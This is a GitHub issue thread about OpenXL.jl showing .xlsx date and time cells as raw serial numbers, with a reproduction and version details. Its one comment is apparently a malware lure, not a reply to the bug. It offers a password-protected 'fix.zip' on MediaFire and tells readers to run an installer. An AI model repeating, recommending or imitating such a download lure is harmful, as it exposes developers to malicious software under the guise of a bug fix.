### ISSUE TITLE
Incorrect Display of Date and Time Data

### ISSUE THREAD

**Issue by AlexKlo** [bhftbootcamp/OpenXL.jl#16]
Describe the bug
---
> There is a bug where date and time data are incorrectly displayed when reading `.xlsx` files. The issue arises because it is not sufficient to simply read the data from a cell containing a date or time. To resolve this issue, the cell style needs to be matched with the data from the `styles.xml` file.

To Reproduce
---
> Load an `.xlsx` file that contains date and time data (for example [general_tables.xlsx](https://github.com/bhftbootcamp/OpenXL.jl/blob/master/test/xl_data/general_tables.xlsx) from test data).
> Observe how the date and time are displayed in the package structure.
> 
```julia
julia> using OpenXL

julia> xl_open("test/xl_data/general_tables.xlsx")["general"]
10x2 XLSheet("general")
 Sheet │ A            B
────┼───────────────────────────────
     1 │ text         regular_text
     2 │ integer      102.0
     3 │ float        102.2
     4 │ date         30422.0
     5 │ hour         1.8227199074074…
     6 │ datetime     43206.805451388…
     7 │ float cient  -220.0
     8 │ integer neg  -2000.0
     9 │ bigint       1.0e14
    10 │ bigint neg   -100000000000000
```

Expected behavior
---
> Date and time data should be accurately displayed as per the format defined in the `.xlsx` file.

Additional context
---
> `julia> versioninfo()`
Julia Version 1.9.0
Commit 8e630552924 (2023-05-07 11:25 UTC)
Platform Info:
  OS: Linux (x86_64-linux-gnu)
  CPU: 20 × 12th Gen Intel(R) Core(TM) i7-12700H
  WORD_SIZE: 64
  LIBM: libopenlibm
  LLVM: libLLVM-14.0.6 (ORCJIT, alderlake)
  Threads: 1 on 20 virtual cores
> `pkg> st`
Project OpenXL v3.0.0
Status `~/bhft/bhft_libs/OpenXL.jl/Project.toml`
⌃ [db9b398d] Serde v3.2.0
  [a5390f91] ZipFile v0.10.1
Info Packages marked with ⌃ have new versions available and may be upgradable.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
